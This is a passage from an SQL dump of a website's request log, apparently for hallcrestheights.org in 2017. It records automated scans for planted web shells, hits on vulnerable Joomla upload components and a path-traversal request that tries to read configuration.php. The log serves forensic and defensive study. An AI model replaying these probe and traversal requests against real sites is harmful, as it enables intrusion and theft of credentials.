00:00:00'),(6569,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:47','0000-00-00 00:00:00'),(6570,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:49','0000-00-00 00:00:00'),(6571,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:54','0000-00-00 00:00:00'),(6572,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:57','0000-00-00 00:00:00'),(6573,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:13:01','0000-00-00 00:00:00'),(6574,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:13:04','0000-00-00 00:00:00'),(6575,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:13:08','0000-00-00 00:00:00'),(6576,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:13:14','0000-00-00 00:00:00'),(6577,'http://hallcrestheights.org//cache/list.php?z3=RTJvcWZ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:13:18','0000-00-00 00:00:00'),(6578,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/E2oqfv.php',NULL,'','',1,0,'2017-02-17 07:14:48','0000-00-00 00:00:00'),(6579,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/E2oqfv.php',NULL,'','',1,0,'2017-02-17 07:14:52','0000-00-00 00:00:00'),(6580,'http://hallcrestheights.org//wp-content/uploads/E2oqfv.php',NULL,'','',1,0,'2017-02-17 07:14:58','0000-00-00 00:00:00'),(6581,'http://hallcrestheights.org//E2oqfv.php',NULL,'','',1,0,'2017-02-17 07:15:06','0000-00-00 00:00:00'),(6582,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/E2oqfv.php',NULL,'','',1,0,'2017-02-17 07:15:10','0000-00-00 00:00:00'),(6583,'http://hallcrestheights.org/zmkue-i20162629-dtzj-k54974-ivyo-qxifgxuh/xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl-ajholjr-dklt.htm',NULL,'','',1,0,'2017-02-17 18:36:54','0000-00-00 00:00:00'),(6584,'http://hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-i20162629-hnjumnte-k54724-cwfogy-wbiwy.htm',NULL,'','',2,0,'2017-02-17 19:11:32','0000-00-00 00:00:00'),(6585,'http://hallcrestheights.org/vqjny-i20162629-k54874-spvh-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-owtsxp-pbgrr.htm',NULL,'','',1,0,'2017-02-18 04:53:45','0000-00-00 00:00:00'),(6586,'http://hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde/k33774-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-i20162629-fpapuhg.htm',NULL,'','',1,0,'2017-02-18 04:58:41','0000-00-00 00:00:00'),(6587,'http://www.hallcrestheights.org/ryvhr-hmqt/i20162632-yysl-lgeajanp-k53134-dmefnxhq.htm',NULL,'http://search.yahoo.co.jp/','',4,0,'2017-02-18 13:35:42','0000-00-00 00:00:00'),(6588,'http://hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo/k55374-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-i20162629-hribnkn.htm',NULL,'','',1,0,'2017-02-18 15:45:07','0000-00-00 00:00:00'),(6589,'http://hallcrestheights.org/fadla-jfnl/gfpc-vwgmyhde-i20162629-k54574-cwxbdeud.htm',NULL,'','',2,0,'2017-02-19 11:15:59','0000-00-00 00:00:00'),(6590,'http://hallcrestheights.org//images/1ndex.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-02-20 00:59:54','0000-00-00 00:00:00'),(6591,'http://hallcrestheights.org//functions.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-20 01:07:54','0000-00-00 00:00:00'),(6592,'http://hallcrestheights.org//cache/news.php?z3=blZ1YlZxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-02-20 01:11:03','0000-00-00 00:00:00'),(6593,'http://hallcrestheights.org//tmp.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-02-20 01:12:41','0000-00-00 00:00:00'),(6594,'http://hallcrestheights.org//shootme.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-20 01:15:54','0000-00-00 00:00:00'),(6595,'http://hallcrestheights.org//configurationbak.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-20 01:17:30','0000-00-00 00:00:00'),(6596,'http://hallcrestheights.org//robots.txt.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-20 01:19:08','0000-00-00 00:00:00'),(6597,'http://hallcrestheights.org//jconfig.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:10','0000-00-00 00:00:00'),(6598,'http://hallcrestheights.org//media/reads.php?z3=blZ1YlZxLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:13','0000-00-00 00:00:00'),(6599,'http://hallcrestheights.org//media/1ndex.php?z3=blZ1YlZxLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:17','0000-00-00 00:00:00'),(6600,'http://hallcrestheights.org//sql_dump.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:20','0000-00-00 00:00:00'),(6601,'http://hallcrestheights.org//images/laj.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:24','0000-00-00 00:00:00'),(6602,'http://hallcrestheights.org//media/404.php?z3=blZ1YlZxLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:30','0000-00-00 00:00:00'),(6603,'http://hallcrestheights.org//media/tmp.php?z3=blZ1YlZxLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:32','0000-00-00 00:00:00'),(6604,'http://hallcrestheights.org//r3x.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:35','0000-00-00 00:00:00'),(6605,'http://hallcrestheights.org//log.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:37','0000-00-00 00:00:00'),(6606,'http://hallcrestheights.org//images/stories/0day.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:40','0000-00-00 00:00:00'),(6607,'http://hallcrestheights.org//includes/u2p.php?z3=blZ1YlZxLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:43','0000-00-00 00:00:00'),(6608,'http://hallcrestheights.org//images/xxx.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:45','0000-00-00 00:00:00'),(6609,'http://hallcrestheights.org//al277.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:48','0000-00-00 00:00:00'),(6610,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=blZ1YlZxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:51','0000-00-00 00:00:00'),(6611,'http://hallcrestheights.org//install.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:54','0000-00-00 00:00:00'),(6612,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=blZ1YlZxLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:19:57','0000-00-00 00:00:00'),(6613,'http://hallcrestheights.org//robot.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:00','0000-00-00 00:00:00'),(6614,'http://hallcrestheights.org//wsdl.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:03','0000-00-00 00:00:00'),(6615,'http://hallcrestheights.org//goog1es.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:06','0000-00-00 00:00:00'),(6616,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=blZ1YlZxLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:09','0000-00-00 00:00:00'),(6617,'http://hallcrestheights.org//update.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:12','0000-00-00 00:00:00'),(6618,'http://hallcrestheights.org//includes.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:15','0000-00-00 00:00:00'),(6619,'http://hallcrestheights.org//wp-main.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:18','0000-00-00 00:00:00'),(6620,'http://hallcrestheights.org//news.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:21','0000-00-00 00:00:00'),(6621,'http://hallcrestheights.org//images/al277.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:23','0000-00-00 00:00:00'),(6622,'http://hallcrestheights.org//webconfig.txt.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:26','0000-00-00 00:00:00'),(6623,'http://hallcrestheights.org//cache/cachee.php?z3=blZ1YlZxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:30','0000-00-00 00:00:00'),(6624,'http://hallcrestheights.org//thumb.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:33','0000-00-00 00:00:00'),(6625,'http://hallcrestheights.org//SessionController.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:40','0000-00-00 00:00:00'),(6626,'http://hallcrestheights.org//maill.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:42','0000-00-00 00:00:00'),(6627,'http://hallcrestheights.org//error-log.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:47','0000-00-00 00:00:00'),(6628,'http://hallcrestheights.org//authenticating.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:50','0000-00-00 00:00:00'),(6629,'http://hallcrestheights.org//google-assist.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:52','0000-00-00 00:00:00'),(6630,'http://hallcrestheights.org//images/google-assist.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:20:57','0000-00-00 00:00:00'),(6631,'http://hallcrestheights.org//images/robots.txt.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:00','0000-00-00 00:00:00'),(6632,'http://hallcrestheights.org//elements.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:03','0000-00-00 00:00:00'),(6633,'http://hallcrestheights.org//xmlsrpc.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:06','0000-00-00 00:00:00'),(6634,'http://hallcrestheights.org//wp-cache.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:08','0000-00-00 00:00:00'),(6635,'http://hallcrestheights.org//images/404.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:11','0000-00-00 00:00:00'),(6636,'http://hallcrestheights.org//images/head.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:13','0000-00-00 00:00:00'),(6637,'http://hallcrestheights.org//cache/support.php?z3=blZ1YlZxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:16','0000-00-00 00:00:00'),(6638,'http://hallcrestheights.org//RoseLeif.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:19','0000-00-00 00:00:00'),(6639,'http://hallcrestheights.org//Abbrevsprl.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:22','0000-00-00 00:00:00'),(6640,'http://hallcrestheights.org//show.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:25','0000-00-00 00:00:00'),(6641,'http://hallcrestheights.org//images/defau1t.php?z3=blZ1YlZxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:28','0000-00-00 00:00:00'),(6642,'http://hallcrestheights.org//cli/40dd1d.php?z3=blZ1YlZxLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:31','0000-00-00 00:00:00'),(6643,'http://hallcrestheights.org//infos.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:35','0000-00-00 00:00:00'),(6644,'http://hallcrestheights.org//cache/defau1t.php?z3=blZ1YlZxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:38','0000-00-00 00:00:00'),(6645,'http://hallcrestheights.org//bookmark.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:40','0000-00-00 00:00:00'),(6646,'http://hallcrestheights.org//configbak.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:43','0000-00-00 00:00:00'),(6647,'http://hallcrestheights.org//wp-data.php?z3=blZ1YlZxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:45','0000-00-00 00:00:00'),(6648,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:48','0000-00-00 00:00:00'),(6649,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:50','0000-00-00 00:00:00'),(6650,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:53','0000-00-00 00:00:00'),(6651,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:56','0000-00-00 00:00:00'),(6652,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:21:58','0000-00-00 00:00:00'),(6653,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:22:01','0000-00-00 00:00:00'),(6654,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:22:03','0000-00-00 00:00:00'),(6655,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:22:06','0000-00-00 00:00:00'),(6656,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:22:09','0000-00-00 00:00:00'),(6657,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=blZ1YlZxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:22:13','0000-00-00 00:00:00'),(6658,'http://hallcrestheights.org//cache/list.php?z3=blZ1YlZxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-20 01:22:16','0000-00-00 00:00:00'),(6659,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/nVubVq.php',NULL,'','',1,0,'2017-02-20 01:23:01','0000-00-00 00:00:00'),(6660,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/nVubVq.php',NULL,'','',1,0,'2017-02-20 01:23:02','0000-00-00 00:00:00'),(6661,'http://hallcrestheights.org//wp-content/uploads/nVubVq.php',NULL,'','',1,0,'2017-02-20 01:23:05','0000-00-00 00:00:00'),(6662,'http://hallcrestheights.org//nVubVq.php',NULL,'','',1,0,'2017-02-20 01:23:07','0000-00-00 00:00:00'),(6663,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/nVubVq.php',NULL,'','',1,0,'2017-02-20 01:23:09','0000-00-00 00:00:00'),(6664,'http://hallcrestheights.org///index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',4,0,'2017-02-20 02:49:09','0000-00-00 00:00:00'),(6665,'http://hallcrestheights.org//index.php?option=com_myblog&task=ajaxupload',NULL,'','',5,0,'2017-02-20 02:49:17','0000-00-00 00:00:00'),(6666,'http://hallcrestheights.org/index.php?option=com_jdownloads&Itemid=0&view=upload',NULL,'','',12,0,'2017-02-20 02:49:18','0000-00-00 00:00:00'),(6667,'http://hallcrestheights.org//components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',5,0,'2017-02-20 02:49:19','0000-00-00 00:00:00'),(6668,'http://hallcrestheights.org//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',16,0,'2017-02-20 02:49:21','0000-00-00 00:00:00'),(6669,'http://hallcrestheights.org/i20162628-gnfznx-vjxpal-k46766-titjsh-kyjy/ldpija-amdurt-aenpg-gwtdvlx-tdqkunf-glqrhz-yonxfeq-nzsv.htm',NULL,'','',1,0,'2017-02-20 06:50:39','0000-00-00 00:00:00'),(6670,'http://hallcrestheights.org/mrcqg-beif-uwgr-i20162629-abtnwyrq/semgwkow-hmemxg-kucyb-npzkic-k55074-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',2,0,'2017-02-21 10:13:25','0000-00-00 00:00:00'),(6671,'http://hallcrestheights.org/gnfzn-xvjx-palt/itjshkyj-yldpijaa-i20162629-mdurta-k54774-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-02-22 07:11:47','0000-00-00 00:00:00'),(6672,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k22012-sllge-ajanpd-i20162634-mefnxhq.htm',NULL,'http://www.google.co.jp/','',6,0,'2017-02-22 10:41:37','0000-00-00 00:00:00'),(6673,'http://hallcrestheights.org/PaYoZ/download.php?name=HH_Newsletter_201412.pdf',NULL,'','',1,0,'2017-02-22 23:58:13','0000-00-00 00:00:00'),(6674,'http://hallcrestheights.org/ixnmu-i20162629-eahw/k55274-hioz-hjxbnwpg-eyooayik-uksszq.htm',NULL,'','',2,0,'2017-02-23 04:34:58','0000-00-00 00:00:00'),(6675,'http://hallcrestheights.org/plugins/content/apismtp/settings.php',NULL,'','',4,0,'2017-02-23 10:50:52','0000-00-00 00:00:00'),(6676,'http://www.hallcrestheights.org/jgletky-mdrqznrv-k52428-mlkswazv-kecqqne-eiaqjz-lnplq-i20162632-fcnebxil-nvox-bdjvee-bikp-tjvl.htm',NULL,'https://www.google.co.jp/','',14,0,'2017-02-23 10:51:55','0000-00-00 00:00:00'),(6677,'http://hallcrestheights.org/ixnmu-i20162629-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq-domytn-k33824-iholb-dentafy-mluzext-lfgg.htm',NULL,'','',1,0,'2017-02-23 19:59:11','0000-00-00 00:00:00'),(6678,'http://www.hallcrestheights.org/foreign-qualification',NULL,'','',1,0,'2017-02-24 00:51:52','0000-00-00 00:00:00'),(6679,'http://hallcrestheights.org//sqlbak.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:05:48','0000-00-00 00:00:00'),(6680,'http://hallcrestheights.org//email.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:05:54','0000-00-00 00:00:00'),(6681,'http://hallcrestheights.org//functions.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:03','0000-00-00 00:00:00'),(6682,'http://hallcrestheights.org//cache/news.php?z3=RmdQVzNuLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:07','0000-00-00 00:00:00'),(6683,'http://hallcrestheights.org//tmp.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-02-24 15:06:09','0000-00-00 00:00:00'),(6684,'http://hallcrestheights.org//shootme.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:11','0000-00-00 00:00:00'),(6685,'http://hallcrestheights.org//configurationbak.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:15','0000-00-00 00:00:00'),(6686,'http://hallcrestheights.org//robots.txt.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:17','0000-00-00 00:00:00'),(6687,'http://hallcrestheights.org//jconfig.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:20','0000-00-00 00:00:00'),(6688,'http://hallcrestheights.org//media/reads.php?z3=RmdQVzNuLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:23','0000-00-00 00:00:00'),(6689,'http://hallcrestheights.org//media/1ndex.php?z3=RmdQVzNuLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:25','0000-00-00 00:00:00'),(6690,'http://hallcrestheights.org//sql_dump.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:28','0000-00-00 00:00:00'),(6691,'http://hallcrestheights.org//images/laj.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:31','0000-00-00 00:00:00'),(6692,'http://hallcrestheights.org//media/404.php?z3=RmdQVzNuLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:35','0000-00-00 00:00:00'),(6693,'http://hallcrestheights.org//media/tmp.php?z3=RmdQVzNuLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:37','0000-00-00 00:00:00'),(6694,'http://hallcrestheights.org//r3x.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:40','0000-00-00 00:00:00'),(6695,'http://hallcrestheights.org//log.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:41','0000-00-00 00:00:00'),(6696,'http://hallcrestheights.org//images/stories/0day.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:44','0000-00-00 00:00:00'),(6697,'http://hallcrestheights.org//includes/u2p.php?z3=RmdQVzNuLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:46','0000-00-00 00:00:00'),(6698,'http://hallcrestheights.org//images/xxx.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:48','0000-00-00 00:00:00'),(6699,'http://hallcrestheights.org//al277.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:52','0000-00-00 00:00:00'),(6700,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=RmdQVzNuLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:55','0000-00-00 00:00:00'),(6701,'http://hallcrestheights.org//install.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:06:58','0000-00-00 00:00:00'),(6702,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=RmdQVzNuLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:00','0000-00-00 00:00:00'),(6703,'http://hallcrestheights.org//robot.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:03','0000-00-00 00:00:00'),(6704,'http://hallcrestheights.org//wsdl.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:06','0000-00-00 00:00:00'),(6705,'http://hallcrestheights.org//goog1es.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:09','0000-00-00 00:00:00'),(6706,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=RmdQVzNuLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:11','0000-00-00 00:00:00'),(6707,'http://hallcrestheights.org//update.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:15','0000-00-00 00:00:00'),(6708,'http://hallcrestheights.org//includes.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:18','0000-00-00 00:00:00'),(6709,'http://hallcrestheights.org//wp-main.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:20','0000-00-00 00:00:00'),(6710,'http://hallcrestheights.org//news.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:23','0000-00-00 00:00:00'),(6711,'http://hallcrestheights.org//images/al277.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:25','0000-00-00 